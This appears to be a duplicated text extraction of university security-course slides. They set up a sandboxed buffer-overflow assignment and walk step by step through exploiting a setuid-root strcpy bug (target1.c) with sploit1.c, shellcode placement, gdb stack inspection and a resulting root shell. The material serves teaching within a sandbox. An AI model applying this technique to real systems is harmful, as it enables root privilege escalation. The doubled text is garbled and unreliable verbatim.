Programming Project # 1Programming Project # 1cs155cs155

Due: Thursday, April 21Due: Thursday, April 21stst, 11:59pm, 11:59pmShayan GuhaShayan Guha

Elizabeth StinsonElizabeth Stinson

OverviewOverview

You’ll be given the source code for 7 short You’ll be given the source code for 7 short buggy programs (target[1-7].c). These programs buggy programs (target[1-7].c). These programs will be installed with setuid rootwill be installed with setuid root

Your job is to write exploits (sploit[1-7].c) that Your job is to write exploits (sploit[1-7].c) that when run as user can get the target programs to when run as user can get the target programs to run /bin/sh for you as rootrun /bin/sh for you as root

Each ‘sploit basically execve’s its corresponding Each ‘sploit basically execve’s its corresponding target with a buffer as its parameter – all you target with a buffer as its parameter – all you have to do is craft that buffer appropriately.have to do is craft that buffer appropriately.

All of this will be done in a sandbox – “Do no All of this will be done in a sandbox – “Do no evil”evil”

Getting the codeGetting the code ssh into ssh into ONE OF THE FIRST FIVE RAPTOR MACHINESONE OF THE FIRST FIVE RAPTOR MACHINES Create a cs155 directory to store the targets + sploits in your afs Create a cs155 directory to store the targets + sploits in your afs

spacespace Then from that directory do: Then from that directory do: $ tar -xvzf /usr/class/cs155/projects/pp1/cs155-$ tar -xvzf /usr/class/cs155/projects/pp1/cs155-

pp1.tar.gzpp1.tar.gz Create a directory in the /tmp partition of one of the first five raptor Create a directory in the /tmp partition of one of the first five raptor

machines – this is where you’ll store the sandbox’s file system machines – this is where you’ll store the sandbox’s file system image (cow)image (cow)

cd /tmpcd /tmpmkdir <SUNet ID>mkdir <SUNet ID>

More getting started…More getting started…

Open an xterm window, Open an xterm window,

then set up environment from it:then set up environment from it:

raptor2:/tmp/stinson> raptor2:/tmp/stinson> setenv BOXESDIR /var/tmp/boxessetenv BOXESDIR /var/tmp/boxes

raptor2:/tmp/stinson> raptor2:/tmp/stinson> setenv BOXESHOME /tmp/stinsonsetenv BOXESHOME /tmp/stinson

raptor2:/tmp/stinson> raptor2:/tmp/stinson> setenv PATH /var/tmp/boxes:$PATHsetenv PATH /var/tmp/boxes:$PATH

Put this in your .cshrc filePut this in your .cshrc file

Running boxesRunning boxes

Then start up boxes:Then start up boxes:

raptor9:/tmp/stinson> raptor9:/tmp/stinson> xterm –e $BOXESDIR/string &xterm –e $BOXESDIR/string &

starts up the “switch daemon”; leave this runningstarts up the “switch daemon”; leave this running

raptor9:/tmp/stinson> raptor9:/tmp/stinson> $BOXESDIR/openbox cow1 10.64.64.64$BOXESDIR/openbox cow1 10.64.64.64

We all use the same IP? Yes. It’s a virtual IP for a virtual network.We all use the same IP? Yes. It’s a virtual IP for a virtual network.

Note: openbox vs. closedboxNote: openbox vs. closedbox Openbox: changes you make to files mounted on boxes will filter down Openbox: changes you make to files mounted on boxes will filter down

Need to be running openbox in order to issue Need to be running openbox in order to issue mountmount? I think so.? I think so. Closedbox: what we’ll be testing withClosedbox: what we’ll be testing with

Now what?Now what?

A virtual console should pop upA virtual console should pop up

There are two accounts on these boxes:There are two accounts on these boxes:Username: userUsername: user Password: userPassword: user

Username: rootUsername: root Password: rootPassword: root

Log in as rootLog in as root

More getting startedMore getting started

Then should see:Then should see: box:~#box:~#

Do:Do: box:~# box:~# TERM=vt100TERM=vt100box:~# box:~# cd /etccd /etcbox:~# box:~# nano inittabnano inittab

OPTIONAL – to popup more consoles when you run OPTIONAL – to popup more consoles when you run boxes, edit “inittab” via uncommenting out lines:boxes, edit “inittab” via uncommenting out lines:##2:23:respawn:/sbin/getty 38400 vc/2##2:23:respawn:/sbin/getty 38400 vc/2##3:23:respawn:/sbin/getty 38400 vc/3##3:23:respawn:/sbin/getty 38400 vc/3

More…More…

Now those lines in inittab should look like:Now those lines in inittab should look like:

2:23:respawn:/sbin/getty 38400 vc/22:23:respawn:/sbin/getty 38400 vc/2

3:23:respawn:/sbin/getty 38400 vc/33:23:respawn:/sbin/getty 38400 vc/3 CNTRL-X and save your changes (they will be CNTRL-X and save your changes (they will be

saved to the cow so that you won’t have to re-saved to the cow so that you won’t have to re-execute these steps every time)execute these steps every time)

Then do:Then do: box:~# box:~# halthalt

Only root can Only root can halthalt; causes all consoles to close…; causes all consoles to close…

finally…finally…

Then restart via:Then restart via:

raptor9:/tmp/stinson> raptor9:/tmp/stinson> $BOXESDIR/openbox cow1 10.64.64.64$BOXESDIR/openbox cow1 10.64.64.64

Then log in as root again and:Then log in as root again and:

box:~# box:~# mount none -t hostfs /mnt –o /afs/ir/users/s/t/stinson/cs155/pp1mount none -t hostfs /mnt –o /afs/ir/users/s/t/stinson/cs155/pp1

Whoops, a bit moreWhoops, a bit more

Then you’ll need to:Then you’ll need to: Copy the sploits dir to ~userCopy the sploits dir to ~user chown user:user ~user/*chown user:user ~user/* Copy the individual targets to /tmpCopy the individual targets to /tmp cd to /tmpcd to /tmp chown root:root for each of the targetschown root:root for each of the targets Make the targetsMake the targets setuid the targets - chmod 4755 for each of setuid the targets - chmod 4755 for each of

the target binariesthe target binaries

Will I have to do that all every time?Will I have to do that all every time?

No.No. Be aware that the /tmp partitions get cleaned out Be aware that the /tmp partitions get cleaned out

periodically (about every week); so your cow periodically (about every week); so your cow image may be lost! zip it up when you’re taking a image may be lost! zip it up when you’re taking a break between exploits and copy it into your afs break between exploits and copy it into your afs space. space.

The /tmp directory for boxes will also be cleaned The /tmp directory for boxes will also be cleaned everytime you restart it – so copy the code everytime you restart it – so copy the code from /tmp to /root before you shut it downfrom /tmp to /root before you shut it down

Boxes resourcesBoxes resources

Please see…Please see…

(a) boxes/FAQ(a) boxes/FAQ

a bit on setting up boxesa bit on setting up boxes

a bit on gcc stack alignmenta bit on gcc stack alignment

plus other miscplus other misc

(b) boxes/README(b) boxes/README

more on the boxes systemmore on the boxes system

GDBGDB GDB: GDB: http://www.sens.buffalo.edu/UBiquity/software/gnu/doc/web/share/doc/gdb/html/gdb/http://www.sens.buffalo.edu/UBiquity/software/gnu/doc/web/share/doc/gdb/html/gdb/

Google Google “Using GDB: A Guide to the GNU Source-Level Debugger”“Using GDB: A Guide to the GNU Source-Level Debugger”

See especially:See especially: Examining Stack DataExamining Stack Datax/ax/a : to print contents of an address (word) : to print contents of an address (word) x/a buf prints first 4 bytes of buf variablex/a buf prints first 4 bytes of buf variablePress <enter> to walk up the stack 4 bytes at a timePress <enter> to walk up the stack 4 bytes at a timex/sx/s : to print a string : to print a string Registers : $sp (stack pointer); $fp (frame pointer); $pc (program Registers : $sp (stack pointer); $fp (frame pointer); $pc (program

counter)counter)p/x $pcp/x $pc : to print the program counter in hex : to print the program counter in hexx/i $pcx/i $pc : to print the instruction to be executed next : to print the instruction to be executed nextinfo registersinfo registers : to print all regs + their values : to print all regs + their values Looking at assembly: disassemble <function name>Looking at assembly: disassemble <function name>

IA-32 referencesIA-32 references

Go here: Go here: http://developer.intel.com/design/pentium4/manuals/index_new.htm#sdm_vol1http://developer.intel.com/design/pentium4/manuals/index_new.htm#sdm_vol1

See in particular pages 137-160 of this:See in particular pages 137-160 of this:ftp://download.intel.com/design/Pentium4/manuals/25366514.pdfftp://download.intel.com/design/Pentium4/manuals/25366514.pdf

HTML list of all IA-32 assembly:HTML list of all IA-32 assembly:

http://http://www.cs.tut.fi/~siponen/upros/intelwww.cs.tut.fi/~siponen/upros/intel//

IA-32 reviewIA-32 review $esp : Stack Pointer (SP) : points to the bottom of the $esp : Stack Pointer (SP) : points to the bottom of the

stack (lowest mem address)stack (lowest mem address) Points to last used word in stack or next available word location Points to last used word in stack or next available word location

on stack (implementation dependent)on stack (implementation dependent) $ebp : Frame Pointer (FP) : points to fixed location within $ebp : Frame Pointer (FP) : points to fixed location within

an activation record (stack frame)an activation record (stack frame) If $ebp for some stack frame is stored at addy X then $eip for If $ebp for some stack frame is stored at addy X then $eip for

that frame is stored at addy X + 4that frame is stored at addy X + 4 Used to reference local vars and parameters since the distance Used to reference local vars and parameters since the distance

from any of those to the frame pointer will not change whereas from any of those to the frame pointer will not change whereas the distance from those to the stack pointer will (as other the distance from those to the stack pointer will (as other functions are called and the stack pointer is decrem’d …)functions are called and the stack pointer is decrem’d …)

$eip : instruction pointer (aka $ra)$eip : instruction pointer (aka $ra) ““The instruction pointer (EIP) register contains the offset in the The instruction pointer (EIP) register contains the offset in the

current code segment for the next instruction to be executed.”current code segment for the next instruction to be executed.”

More IA-32 reviewMore IA-32 review

When CALL procedure p(),When CALL procedure p(), Push eip : the return address ($ra)Push eip : the return address ($ra) Push ebp : saves previous frame pointerPush ebp : saves previous frame pointer Copy sp into fp : ebp = espCopy sp into fp : ebp = esp

The new AR’s frame pointer will be the previous value of the The new AR’s frame pointer will be the previous value of the stack pointerstack pointer

Advance sp (esp) for allocations on stack (that is, Advance sp (esp) for allocations on stack (that is, decrement it) – done via the push instructiondecrement it) – done via the push instruction

When LEAVE procedure p(),When LEAVE procedure p(), This process is reversedThis process is reversed Load ebp into espLoad ebp into esp Restore ebp from the stackRestore ebp from the stack

Interaction between EIP, EBP, ESPInteraction between EIP, EBP, ESP

During CALL, value of eip register pushed onto During CALL, value of eip register pushed onto stackstack

Before RET, programmer should make sure that Before RET, programmer should make sure that stack pointer (esp) is pointing to the eip on the stack pointer (esp) is pointing to the eip on the stack; does this via:stack; does this via: Move contents of $ebp into $espMove contents of $ebp into $esp Increment $esp by 4Increment $esp by 4 $esp should now point to (contain addy of) $eip$esp should now point to (contain addy of) $eip RET will load the value stored in $esp into the $eip RET will load the value stored in $esp into the $eip

register then jump to that valueregister then jump to that value

Stack LayoutStack Layoutvoid function( int a, int b, int c ) {void function( int a, int b, int c ) {

char buf1[5];char buf1[5];char buf2[10];char buf2[10];

}}Stack:Stack:

cc bb aa $ra [ eip ]$ra [ eip ]

ebp ebp $fp [ ebp ] $fp [ ebp ] <other stuff…><other stuff…> buf1 – word aligned (so takes 8 bytes, not 5)buf1 – word aligned (so takes 8 bytes, not 5) buf2 – word aligned (so takes 12 bytes, not 10)buf2 – word aligned (so takes 12 bytes, not 10)

esp esp [ esp points somewhere down here… ][ esp points somewhere down here… ]

Stack Layout – function returnStack Layout – function returnvoid function( int a, int b, int c ) {void function( int a, int b, int c ) {

char buf1[5];char buf1[5];char buf2[10];char buf2[10];

}}Stack:Stack: ebp ebp [top of caller’s function stack][top of caller’s function stack] cc

bb aa

esp esp $ra [ eip ] $ra [ eip ] $fp [ ebp ]$fp [ ebp ] <other stuff…><other stuff…> buf1 – word aligned (so takes 8 bytes, not 5)buf1 – word aligned (so takes 8 bytes, not 5) buf2 – word aligned (so takes 12 bytes, not 10)buf2 – word aligned (so takes 12 bytes, not 10)

[ esp points somewhere down here… ][ esp points somewhere down here… ]

Hacking referencesHacking references

““Smashing the Stack for Fun and Profit”Smashing the Stack for Fun and Profit” AlephOne, linked to on course siteAlephOne, linked to on course site

““Exploiting Format String Vulnerabilities”Exploiting Format String Vulnerabilities” team teso, linked to on course siteteam teso, linked to on course site

Chapter 7: Chapter 7: Exploiting SoftwareExploiting Software

Hoglund & McGraw (not required but nice)Hoglund & McGraw (not required but nice) PhrackPhrack Prof. Boneh’s April 4Prof. Boneh’s April 4thth lecture lecture

target1.ctarget1.c

int foo( char *arg, char *out ) {int foo( char *arg, char *out ) { strcpy( out, arg );strcpy( out, arg ); return 0; }return 0; }int main( int argc, char *argv[] ) {int main( int argc, char *argv[] ) { char buf[64];char buf[64]; if ( argc != 2 ) { … }if ( argc != 2 ) { … } foo( argv[1], buf );foo( argv[1], buf ); return 0; }return 0; }

Stack in target1 – layout in memStack in target1 – layout in mem

argv[1] == <shellcode + buf’s addy>argv[1] == <shellcode + buf’s addy> argv[0] == “/tmp/target1”argv[0] == “/tmp/target1” argcargc $ra – to which $ra – to which main()main() will return will return $fp – for main’s stack frame$fp – for main’s stack frame buf[64]buf[64] ptr to buf == “out”ptr to buf == “out” // args to // args to foo()foo() ptr to argv[1] == “arg”ptr to argv[1] == “arg” // args to // args to foo()foo()

sploit1sploit1

Need:Need: Location of return address (addy on stack Location of return address (addy on stack

where $ra that we’re going to overwrite lives)where $ra that we’re going to overwrite lives) main()main()’s $ra since that’s the $ra *above* the buf ’s $ra since that’s the $ra *above* the buf

so that’s the one we’ll be able to overwriteso that’s the one we’ll be able to overwrite Not Not foo()foo()’s, right? why not?’s, right? why not?

So we know how much we have to overwrite…So we know how much we have to overwrite…

Address of the buffer (“buf” in target1)Address of the buffer (“buf” in target1) So we know what address we want to force the So we know what address we want to force the

program to jump toprogram to jump to

More on sploit1More on sploit1

So just run the program using So just run the program using gdbgdb and and see where the $fp and the $ra live relative see where the $fp and the $ra live relative to where the buf (in target1) livesto where the buf (in target1) lives

So if buf’s addy is: So if buf’s addy is: 0x9ffffe600x9ffffe60 And the $ra for main() is at:And the $ra for main() is at: 0x9ffffeac0x9ffffeac Then we need to make our exploit buffer: Then we need to make our exploit buffer:

0x9ffffeac – 0x9ffffe60 == 0x4C 0x9ffffeac – 0x9ffffe60 == 0x4C 76 + 4 76 + 4 So we’ll make it 81 and null terminate itSo we’ll make it 81 and null terminate it

Buf addyBuf addy

Note that the exact addy of the target1 buf Note that the exact addy of the target1 buf will change depending upon how big the will change depending upon how big the buf you allocate in sploit1.c is – since your buf you allocate in sploit1.c is – since your buf will live *above* the target1 buf on the buf will live *above* the target1 buf on the stackstack

But once you fix your buf size, the addy of But once you fix your buf size, the addy of the target1 buf on the stack won’t change.the target1 buf on the stack won’t change.

Crafting the exploit stringCrafting the exploit string

Well, we’re going to have the target Well, we’re going to have the target program jump to the start of our string so program jump to the start of our string so we’ll want to put the shellcode (size 45 we’ll want to put the shellcode (size 45 bytes) at the start of the string (note bytes) at the start of the string (note aleph1 suggestion re: using nops)aleph1 suggestion re: using nops)

Then we know that the $ra exists at offset Then we know that the $ra exists at offset 76 so we need to be sure that our 76 so we need to be sure that our string[76] contains the addy of the target1 string[76] contains the addy of the target1 buf (0x9ffffe60)buf (0x9ffffe60)

sploit1.csploit1.c……#define SIZE 81#define SIZE 81…… char string[SIZE];char string[SIZE]; // our attack string// our attack string char *ptr = string; char *ptr = string; // to walk thru string a char at a time// to walk thru string a char at a time long *addr_ptr = (long *)string;long *addr_ptr = (long *)string; // to walk thru string a word at a time// to walk thru string a word at a time

long addr = 0x9ffffe60; // the addy of the buffer: where we want control to jump tolong addr = 0x9ffffe60; // the addy of the buffer: where we want control to jump to int i;int i;

for ( i = 0; i < SIZE; i+=4 ) // fill our attack string with the desired $rafor ( i = 0; i < SIZE; i+=4 ) // fill our attack string with the desired $ra *( addr_ptr++ ) = addr;*( addr_ptr++ ) = addr;

for ( i = 0; i < strlen( shellcode ); i++ ) // write the shellcode at the beg of the buffor ( i = 0; i < strlen( shellcode ); i++ ) // write the shellcode at the beg of the buf *( ptr++ ) = shellcode[i];*( ptr++ ) = shellcode[i];

string[ SIZE - 1 ] = '\0';string[ SIZE - 1 ] = '\0'; // null terminate our string// null terminate our string

Finishing up sploit1.cFinishing up sploit1.c

Then we set:Then we set:

args[1] = string;args[1] = string; The rest is unchanged. Re-make.The rest is unchanged. Re-make. Execute via:Execute via:

user@box:/tmp/sploits$ ./sploit1user@box:/tmp/sploits$ ./sploit1

sh-2.05b$ whoamish-2.05b$ whoami

rootroot

sh-2.05b$sh-2.05b$

DebuggingDebugging

user@box:/tmp/sploits$user@box:/tmp/sploits$ gdb –e sploit1 –s /tmp/target1 gdb –e sploit1 –s /tmp/target1[gdb intro message][gdb intro message]

(gdb) r(gdb) r(gdb) b main(gdb) b main(gdb) b foo(gdb) b foo(gdb) c(gdb) c(gdb) x/s 0x9fffff91(gdb) x/s 0x9fffff91 // prints “/tmp/target1”// prints “/tmp/target1”Also, “stepi” “disass” …; see “help”Also, “stepi” “disass” …; see “help”

More debuggingMore debugging

user@box:/tmp/sploits$ user@box:/tmp/sploits$ gdb –e sploit1 –s /tmp/target1gdb –e sploit1 –s /tmp/target1

is same as:is same as:

user@box:/tmp/sploits$ user@box:/tmp/sploits$ gdbgdb

(gdb) (gdb) symbol-file /tmp/target1symbol-file /tmp/target1

(gdb) (gdb) exec-file sploit1exec-file sploit1

Walking through a working sploitWalking through a working sploit

user@box:/tmp/sploits$user@box:/tmp/sploits$ gdb –e sploit1 –s /tmp/target1gdb –e sploit1 –s /tmp/target1(gdb) r(gdb) r(gdb) b main(gdb) b main(gdb) b foo(gdb) b foo(gdb) c(gdb) c(gdb) p/x $fp(gdb) p/x $fp 0x9ffffeb0 0x9ffffeb0 [now we’re in [now we’re in main()main()]](gdb) p/x $sp(gdb) p/x $sp 0x9ffffe50 0x9ffffe50(gdb) p/x $pc(gdb) p/x $pc 0x8048413 0x8048413(gdb) x/a buf(gdb) x/a buf 0x9ffffe60 0x9ffffe60(gdb) c(gdb) c(gdb) s(gdb) s [now we’re in [now we’re in foo()foo()]](gdb) s(gdb) s

(gdb) s (gdb) s [back in [back in main()main() now…] now…]

(gdb) x/a buf (gdb) x/a buf [contains [contains shellcodeshellcode now] now]

(gdb) p/x $fp(gdb) p/x $fp 0x9ffffeb0 0x9ffffeb0

(gdb) p/x $sp(gdb) p/x $sp 0x9ffffe50 0x9ffffe50

(gdb) p/x $pc(gdb) p/x $pc 0x8048451 0x8048451

(gdb) stepi(gdb) stepi

(gdb) x/i $pc(gdb) x/i $pc 0x8048456 <main+83> : leave 0x8048456 <main+83> : leave

(gdb) stepi(gdb) stepi

(gdb) x/a $pc(gdb) x/a $pc 0x8048456 <main+84> : ret 0x8048456 <main+84> : ret

Next instruction exec’d will be Next instruction exec’d will be retret; when you call ; when you call retret::eip = ebpeip = ebp // set the current PC… // set the current PC…

// …to be the value stored at ebp// …to be the value stored at ebpjump eip jump eip // jump to that newly reloaded PC & // jump to that newly reloaded PC & executeexecute

(gdb) x/a $sp(gdb) x/a $sp 0x9ffffe60 0x9ffffe60 [the contents of $sp][the contents of $sp](gdb) stepi(gdb) stepi 0x9ffffe60 in ?? 0x9ffffe60 in ?? [we’re in the buf!][we’re in the buf!](gdb) c(gdb) csh-2.05b$sh-2.05b$

The stackThe stack0x9ffffef80x9ffffef8 | 0x9fffff9e| 0x9fffff9e | argv[1] : f9e = SHELLCODE | argv[1] : f9e = SHELLCODE 0x9ffffef40x9ffffef4 | 0x9fffff91| 0x9fffff91 | argv[0] : f91 = "/tmp/target1"| argv[0] : f91 = "/tmp/target1"0x9ffffef00x9ffffef0 | 2| 2 | argc| argc<SNIP><SNIP>0x9ffffeb80x9ffffeb8 | 0x9fffff00| 0x9fffff00 | <--- argv[1] : f00 points to NULL| <--- argv[1] : f00 points to NULL0x9ffffeb40x9ffffeb4 | 0x9ffffef4| 0x9ffffef4 | <--- argv[0] : ef4 points to f91| <--- argv[0] : ef4 points to f910x9ffffeb00x9ffffeb0 | 2| 2 | <--- argc| <--- argc0x9ffffeac0x9ffffeac | __libc_start_main+198 | <--- $ra : what we want to overwrite| __libc_start_main+198 | <--- $ra : what we want to overwrite0x9ffffea80x9ffffea8 | 0x9ffffec8| 0x9ffffec8 | <--- $fp : frame pointer| <--- $fp : frame pointer0x9ffffea40x9ffffea4 | 0x9ffffef4| 0x9ffffef4 | <--- argv[0] : ef4 points to f91| <--- argv[0] : ef4 points to f910x9ffffea00x9ffffea0 | _rtld_global| _rtld_global | <--- garbage alignment stuff? | <--- garbage alignment stuff? 0x9ffffe9c0x9ffffe9c || | ------last word of buf------| ------last word of buf------<SNIP><SNIP>0x9ffffe600x9ffffe60 || | ------beginning of buf------| ------beginning of buf------0x9ffffe5c0x9ffffe5c || ||0x9ffffe580x9ffffe58 || ||0x9ffffe540x9ffffe54 | 0x9ffffe60| 0x9ffffe60 | argv[1] <-- points to beginning of buf| argv[1] <-- points to beginning of buf0x9ffffe500x9ffffe50 | 0x9fffff9e| 0x9fffff9e | argv[0] <-- points to shellcode | argv[0] <-- points to shellcode 0x9ffffe4c0x9ffffe4c | 0x8048461 | <--- $ra in foo() <main+78> | 0x8048461 | <--- $ra in foo() <main+78> 0x9ffffe480x9ffffe48 | 0x9ffffea8| 0x9ffffea8 | <--- $fp in foo()| <--- $fp in foo()

DetailsDetails

Before the LEAVE instruction, we haveBefore the LEAVE instruction, we haveesp = 0x9ffffea0 esp = 0x9ffffea0 ebp = 0x9ffffef8ebp = 0x9ffffef8

Then after the LEAVE instruction, we haveThen after the LEAVE instruction, we haveesp = 0x9ffffefc esp = 0x9ffffefc == ebp + 4 == ebp + 4ebp = 0x9fffff18ebp = 0x9fffff18

So: esp = ebp + 4 So: esp = ebp + 4 (the $ra is stored just above in memory the $fp)(the $ra is stored just above in memory the $fp)Then we jump to the value stored at espThen we jump to the value stored at esp

(gdb) disass main(gdb) disass main

0x08048413 <main+0>: push %ebp0x08048413 <main+0>: push %ebp0x08048414 <main+1>: mov %esp,%ebp0x08048414 <main+1>: mov %esp,%ebp0x08048416 <main+3>: sub $0x58,%esp0x08048416 <main+3>: sub $0x58,%esp0x08048419 <main+6>: and $0xfffffff0,%esp0x08048419 <main+6>: and $0xfffffff0,%esp0x0804841c <main+9>: mov $0x0,%eax0x0804841c <main+9>: mov $0x0,%eax0x08048421 <main+14>: sub %eax,%esp0x08048421 <main+14>: sub %eax,%esp0x08048423 <main+16>: cmpl $0x2,0x8(%ebp)0x08048423 <main+16>: cmpl $0x2,0x8(%ebp)0x08048427 <main+20>: je 0x804844a <main+55>0x08048427 <main+20>: je 0x804844a <main+55>0x08048429 <main+22>: movl $0x8048584,0x4(%esp,1)0x08048429 <main+22>: movl $0x8048584,0x4(%esp,1)0x08048431 <main+30>: mov 0x80496a4,%eax0x08048431 <main+30>: mov 0x80496a4,%eax0x08048436 <main+35>: mov %eax,(%esp,1)0x08048436 <main+35>: mov %eax,(%esp,1)0x08048439 <main+38>: call 0x80482e40x08048439 <main+38>: call 0x80482e40x0804843e <main+43>: movl $0x1,(%esp,1)0x0804843e <main+43>: movl $0x1,(%esp,1)0x08048445 <main+50>: call 0x80483040x08048445 <main+50>: call 0x80483040x0804844a <main+55>: lea 0xffffffb8(%ebp),%eax0x0804844a <main+55>: lea 0xffffffb8(%ebp),%eax0x0804844d <main+58>: mov %eax,0x4(%esp,1)0x0804844d <main+58>: mov %eax,0x4(%esp,1)0x08048451 <main+62>: mov 0xc(%ebp),%eax0x08048451 <main+62>: mov 0xc(%ebp),%eax0x08048454 <main+65>: add $0x4,%eax0x08048454 <main+65>: add $0x4,%eax0x08048457 <main+68>: mov (%eax),%eax0x08048457 <main+68>: mov (%eax),%eax0x08048459 <main+70>: mov %eax,(%esp,1)0x08048459 <main+70>: mov %eax,(%esp,1)0x0804845c <main+73>: call 0x80483f4 <foo>0x0804845c <main+73>: call 0x80483f4 <foo>0x08048461 <main+78>: mov $0x0,%eax0x08048461 <main+78>: mov $0x0,%eax0x08048466 <main+83>: leave 0x08048466 <main+83>: leave 0x08048467 <main+84>: ret 0x08048467 <main+84>: ret End of assembler dump.End of assembler dump.

(gdb) disass foo(gdb) disass foo

Dump of assembler code for function foo:Dump of assembler code for function foo:0x080483e4 <foo+0>: push %ebp0x080483e4 <foo+0>: push %ebp0x080483e5 <foo+1>: mov %esp,%ebp0x080483e5 <foo+1>: mov %esp,%ebp0x080483e7 <foo+3>: sub $0xa8,%esp0x080483e7 <foo+3>: sub $0xa8,%esp0x080483ed <foo+9>: and $0xfffffff0,%esp0x080483ed <foo+9>: and $0xfffffff0,%esp0x080483f0 <foo+12>: mov $0x0,%eax0x080483f0 <foo+12>: mov $0x0,%eax0x080483f5 <foo+17>: sub %eax,%esp0x080483f5 <foo+17>: sub %eax,%esp0x080483f7 <foo+19>: lea 0xffffff78(%ebp),%eax0x080483f7 <foo+19>: lea 0xffffff78(%ebp),%eax0x080483fd <foo+25>: mov %eax,0xffffff74(%ebp)0x080483fd <foo+25>: mov %eax,0xffffff74(%ebp)End of assembler dump.End of assembler dump.

General suggestions / strategyGeneral suggestions / strategy

Look at the targets and figure out what you Look at the targets and figure out what you *can* do for each: can you overflow the buffer? *can* do for each: can you overflow the buffer? If so, by how much? If not, is there a format If so, by how much? If not, is there a format string vulnerability? No? Other weirdness?string vulnerability? No? Other weirdness? Find the weakness first: even if you only have a Find the weakness first: even if you only have a

general idea of what it isgeneral idea of what it is Then, read + researchThen, read + research

Get big picture of what exactly the weakness is and Get big picture of what exactly the weakness is and how an attack on that weakness workshow an attack on that weakness works

Get detailed picture of how such an attack worksGet detailed picture of how such an attack works Then figure out how to adapt that model to the Then figure out how to adapt that model to the

specific code you’re givenspecific code you’re given

Non suggestionsNon suggestions

Madly tweak code, using random $ra’s or Madly tweak code, using random $ra’s or writing random amounts, … hoping to writing random amounts, … hoping to strike gold. It probably won’t work strike gold. It probably won’t work (certainly not for sploits >= 2).(certainly not for sploits >= 2).